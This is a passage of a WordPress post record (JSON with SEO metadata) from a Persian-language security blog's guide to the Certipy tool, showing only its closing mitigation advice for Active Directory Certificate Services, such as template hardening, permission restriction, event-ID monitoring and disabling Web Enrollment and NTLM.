(Mitigation)<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0627\u0632 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0632\u06cc\u0631\u0633\u0627\u062e\u062a Active Directory Certificate Services (AD CS) \u0648 \u062d\u0645\u0644\u0627\u062a \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc\u060c \u0627\u0642\u062f\u0627\u0645\u0627\u062a \u0632\u06cc\u0631 \u062a\u0648\u0635\u06cc\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f:<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0633\u062e\u062a\u200c\u0633\u0627\u0632\u06cc \u0648 \u0645\u0645\u06cc\u0632\u06cc \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc<\/strong><strong> (Certificate Templates):<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0628\u0631\u0631\u0633\u06cc \u062f\u0642\u06cc\u0642 \u0648 \u0645\u062d\u062f\u0648\u062f \u06a9\u0631\u062f\u0646 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc (\u0645\u0627\u0646\u0646\u062f SubCA \u06cc\u0627 DomainController) \u06a9\u0647 \u0627\u0645\u06a9\u0627\u0646 \u0635\u062f\u0648\u0631 \u062e\u0648\u062f\u06a9\u0627\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627 \u0631\u0627 \u062f\u0627\u0631\u0646\u062f. \u0627\u0632 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627\u06cc \u0628\u0627 \u0627\u0645\u062a\u06cc\u0627\u0632 \u0628\u0627\u0644\u0627 \u0628\u062f\u0648\u0646 \u062a\u0623\u06cc\u06cc\u062f \u0686\u0646\u062f\u0645\u0631\u062d\u0644\u0647\u200c\u0627\u06cc \u062e\u0648\u062f\u062f\u0627\u0631\u06cc \u0634\u0648\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u06a9\u0646\u062a\u0631\u0644 \u0645\u062c\u0648\u0632\u0647\u0627\u06cc \u0646\u0648\u0634\u062a\u0646 \u062f\u0631<\/strong><strong> AD (<\/strong><strong>\u0627\u0632 \u062c\u0645\u0644\u0647<\/strong><strong> &#8220;Enroll&#8221;):<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0628\u0631\u0631\u0633\u06cc \u0648 \u0645\u062d\u062f\u0648\u062f\u0633\u0627\u0632\u06cc Write Permissions \u062f\u0631 \u0627\u0634\u06cc\u0627\u0621 \u062d\u0633\u0627\u0633 Active Directory \u0634\u0627\u0645\u0644:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">\u0645\u062c\u0648\u0632 Enroll \u0628\u0631\u0627\u06cc \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0627\u06cc\u062c\u0627\u062f \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631\u06cc<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 Shadow Credentials<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\"><strong>\u0645\u0645\u06cc\u0632\u06cc \u06a9\u0627\u0645\u0644 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u0648 \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a \u062f\u0631 \u0633\u0637\u062d<\/strong><strong> CA:<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc \u0648 \u067e\u0627\u06cc\u0634 \u0631\u062e\u062f\u0627\u062f\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0632\u06cc\u0631 \u062f\u0631 \u0644\u0627\u06af\u200c\u0647\u0627\u06cc \u0648\u06cc\u0646\u062f\u0648\u0632:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">Event ID 4886 \u2013 \u06af\u0648\u0627\u0647\u06cc \u0635\u0627\u062f\u0631 \u0634\u062f\u0647<\/span><\/li>\n<li><span style=\"font-size: 10pt\">Event ID 4887 \u2013 \u062a\u063a\u06cc\u06cc\u0631 \u062f\u0631 CA \u06cc\u0627 \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u0645\u0631\u062a\u0628\u0637<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\">\u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc Web Enrollment \u0648 NTLM (\u062f\u0631 \u0635\u0648\u0631\u062a \u0627\u0645\u06a9\u0627\u0646):<\/span><br \/>\n<span style=\"font-size: 10pt\">\u062f\u0631 \u0635\u0648\u0631\u062a\u06cc \u06a9\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Web Enrollment (CEP\/CES) \u0636\u0631\u0648\u0631\u06cc \u0646\u06cc\u0633\u062a\u060c \u0622\u0646 \u0631\u0627 \u063a\u06cc\u0631\u0641\u0639\u0627\u0644 \u06a9\u0646\u06cc\u062f. \u0647\u0645\u0686\u0646\u06cc\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 NTLM Authentication \u0631\u0627 \u0645\u062d\u062f\u0648\u062f \u06cc\u0627 \u0628\u0647\u200c\u0637\u0648\u0631 \u06a9\u0627\u0645\u0644 \u062d\u0630\u0641 \u0646\u0645\u0627\u06cc\u06cc\u062f \u0648 \u0628\u0647 Kerberos with PKINIT \u062a\u06a9\u06cc\u0647 \u06a9\u0646\u06cc\u062f.<\/span><\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Active Directory \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Certipy \u062f\u0631 \u0627\u06cc\u0646 \u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Active Directory \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Certipy\u060c \u0628\u0631\u0631\u0633\u06cc \u062e\u0648\u0627\u0647\u06cc\u0645 \u06a9\u0631\u062f \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0627\u0632 Certipy\u2014\u06cc\u06a9 \u0627\u0628\u0632\u0627\u0631 \u0645\u062c\u0645\u0648\u0639\u0647\u200c\u0627\u06cc \u062a\u0647\u0627\u062c\u0645\u06cc \u0648 \u062a\u062f\u0627\u0641\u0639\u06cc \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory (AD CS)\u2014\u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0648 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc CA \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645. \u0686\u0647 \u062f\u0631 \u062d\u0627\u0644 &hellip;<\/p>\n","protected":false},"author":14,"featured_media":19915,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1,258,349],"tags":[],"class_list":["post-19879","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-agility","category-teaching","category-slides"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v26.5 (Yoast SEO v27.6) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646<\/title>\n<meta name=\"description\" content=\"\u062f\u0631 \u0627\u06cc\u0646 \u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Active Directory \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Certipy\u060c \u0628\u0631\u0631\u0633\u06cc \u062e\u0648\u0627\u0647\u06cc\u0645 \u06a9\u0631\u062f \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0627\u0632 Certipy\u2014\u06cc\u06a9 \u0627\u0628\u0632\u0627\u0631 \u0645\u062c\u0645\u0648\u0639\u0647\u200c\u0627\u06cc \u062a\u0647\u0627\u062c\u0645\u06cc \u0648 \u062a\u062f\u0627\u0641\u0639\u06cc \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory (AD CS)\u2014\u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0648 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc CA \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/\" \/>\n<meta property=\"og:locale\" content=\"fa_IR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy\" \/>\n<meta property=\"og:description\" content=\"\u062f\u0631 \u0627\u06cc\u0646 \u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Active Directory \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Certipy\u060c \u0628\u0631\u0631\u0633\u06cc \u062e\u0648\u0627\u0647\u06cc\u0645 \u06a9\u0631\u062f \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0627\u0632 Certipy\u2014\u06cc\u06a9 \u0627\u0628\u0632\u0627\u0631 \u0645\u062c\u0645\u0648\u0639\u0647\u200c\u0627\u06cc \u062a\u0647\u0627\u062c\u0645\u06cc \u0648 \u062a\u062f\u0627\u0641\u0639\u06cc \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory (AD CS)\u2014\u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0648 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc CA \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/\" \/>\n<meta property=\"og:site_name\" content=\"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646\" \/>\n<meta property=\"article:published_time\" content=\"2025-07-15T06:00:42+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"682\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/webp\" \/>\n<meta name=\"author\" content=\"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@liansecurity\" \/>\n<meta name=\"twitter:site\" content=\"@liansecurity\" \/>\n<meta name=\"twitter:label1\" content=\"\u0646\u0648\u0634\u062a\u0647\u200c\u0634\u062f\u0647 \u0628\u062f\u0633\u062a\" \/>\n\t<meta name=\"twitter:data1\" content=\"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u0632\u0645\u0627\u0646 \u062a\u0642\u0631\u06cc\u0628\u06cc \u0628\u0631\u0627\u06cc \u062e\u0648\u0627\u0646\u062f\u0646\" \/>\n\t<meta name=\"twitter:data2\" content=\"41 \u062f\u0642\u06cc\u0642\u0647\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/\"},\"author\":{\"name\":\"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#\\\/schema\\\/person\\\/e328f67a35a843fd3accc4666b5eab0a\"},\"headline\":\"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy\",\"datePublished\":\"2025-07-15T06:00:42+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/\"},\"wordCount\":806,\"commentCount\":0,\"image\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp\",\"articleSection\":[\"Agility\",\"\u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u0644\u06cc\u0627\u0646\",\"\u06cc\u06cc\u06cc\u06cc \u0627\u0633\u0644\u0627\u06cc\u062f\"],\"inLanguage\":\"fa-IR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/\",\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/\",\"name\":\"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp\",\"datePublished\":\"2025-07-15T06:00:42+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#\\\/schema\\\/person\\\/e328f67a35a843fd3accc4666b5eab0a\"},\"description\":\"\u062f\u0631 \u0627\u06cc\u0646 \u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Active Directory \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Certipy\u060c \u0628\u0631\u0631\u0633\u06cc \u062e\u0648\u0627\u0647\u06cc\u0645 \u06a9\u0631\u062f \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0627\u0632 Certipy\u2014\u06cc\u06a9 \u0627\u0628\u0632\u0627\u0631 \u0645\u062c\u0645\u0648\u0639\u0647\u200c\u0627\u06cc \u062a\u0647\u0627\u062c\u0645\u06cc \u0648 \u062a\u062f\u0627\u0641\u0639\u06cc \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory (AD CS)\u2014\u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0648 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc CA \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/#breadcrumb\"},\"inLanguage\":\"fa-IR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fa-IR\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/#primaryimage\",\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp\",\"contentUrl\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp\",\"width\":1024,\"height\":682,\"caption\":\"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u062e\u0627\u0646\u0647\",\"item\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/\",\"name\":\"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646\",\"description\":\"\u0622\u062e\u0631\u06cc\u0646 \u0627\u062e\u0628\u0627\u0631\u060c\u0645\u0642\u0627\u0644\u0627\u062a \u0648 \u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u062d\u0648\u0632\u0647 \u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fa-IR\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#\\\/schema\\\/person\\\/e328f67a35a843fd3accc4666b5eab0a\",\"name\":\"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc\",\"sameAs\":[\"https:\\\/\\\/liangroup.net\"],\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/author\\\/s-teymouri\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","description":"\u062f\u0631 \u0627\u06cc\u0646 \u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Active Directory \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Certipy\u060c \u0628\u0631\u0631\u0633\u06cc \u062e\u0648\u0627\u0647\u06cc\u0645 \u06a9\u0631\u062f \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0627\u0632 Certipy\u2014\u06cc\u06a9 \u0627\u0628\u0632\u0627\u0631 \u0645\u062c\u0645\u0648\u0639\u0647\u200c\u0627\u06cc \u062a\u0647\u0627\u062c\u0645\u06cc \u0648 \u062a\u062f\u0627\u0641\u0639\u06cc \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory (AD CS)\u2014\u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0648 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc CA \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/","og_locale":"fa_IR","og_type":"article","og_title":"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy","og_description":"\u062f\u0631 \u0627\u06cc\u0646 \u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Active Directory \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Certipy\u060c \u0628\u0631\u0631\u0633\u06cc \u062e\u0648\u0627\u0647\u06cc\u0645 \u06a9\u0631\u062f \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0627\u0632 Certipy\u2014\u06cc\u06a9 \u0627\u0628\u0632\u0627\u0631 \u0645\u062c\u0645\u0648\u0639\u0647\u200c\u0627\u06cc \u062a\u0647\u0627\u062c\u0645\u06cc \u0648 \u062a\u062f\u0627\u0641\u0639\u06cc \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory (AD CS)\u2014\u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0648 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc CA \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645.","og_url":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/","og_site_name":"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","article_published_time":"2025-07-15T06:00:42+00:00","og_image":[{"width":1024,"height":682,"url":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp","type":"image\/webp"}],"author":"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc","twitter_card":"summary_large_image","twitter_creator":"@liansecurity","twitter_site":"@liansecurity","twitter_misc":{"\u0646\u0648\u0634\u062a\u0647\u200c\u0634\u062f\u0647 \u0628\u062f\u0633\u062a":"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc","\u0632\u0645\u0627\u0646 \u062a\u0642\u0631\u06cc\u0628\u06cc \u0628\u0631\u0627\u06cc \u062e\u0648\u0627\u0646\u062f\u0646":"41 \u062f\u0642\u06cc\u0642\u0647"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/#article","isPartOf":{"@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/"},"author":{"name":"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc","@id":"https:\/\/liangroup.net\/blog\/#\/schema\/person\/e328f67a35a843fd3accc4666b5eab0a"},"headline":"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy","datePublished":"2025-07-15T06:00:42+00:00","mainEntityOfPage":{"@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/"},"wordCount":806,"commentCount":0,"image":{"@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/#primaryimage"},"thumbnailUrl":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp","articleSection":["Agility","\u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u0644\u06cc\u0627\u0646","\u06cc\u06cc\u06cc\u06cc \u0627\u0633\u0644\u0627\u06cc\u062f"],"inLanguage":"fa-IR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/","url":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/","name":"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","isPartOf":{"@id":"https:\/\/liangroup.net\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/#primaryimage"},"image":{"@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/#primaryimage"},"thumbnailUrl":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp","datePublished":"2025-07-15T06:00:42+00:00","author":{"@id":"https:\/\/liangroup.net\/blog\/#\/schema\/person\/e328f67a35a843fd3accc4666b5eab0a"},"description":"\u062f\u0631 \u0627\u06cc\u0646 \u0631\u0627\u0647\u0646\u0645\u0627\u06cc 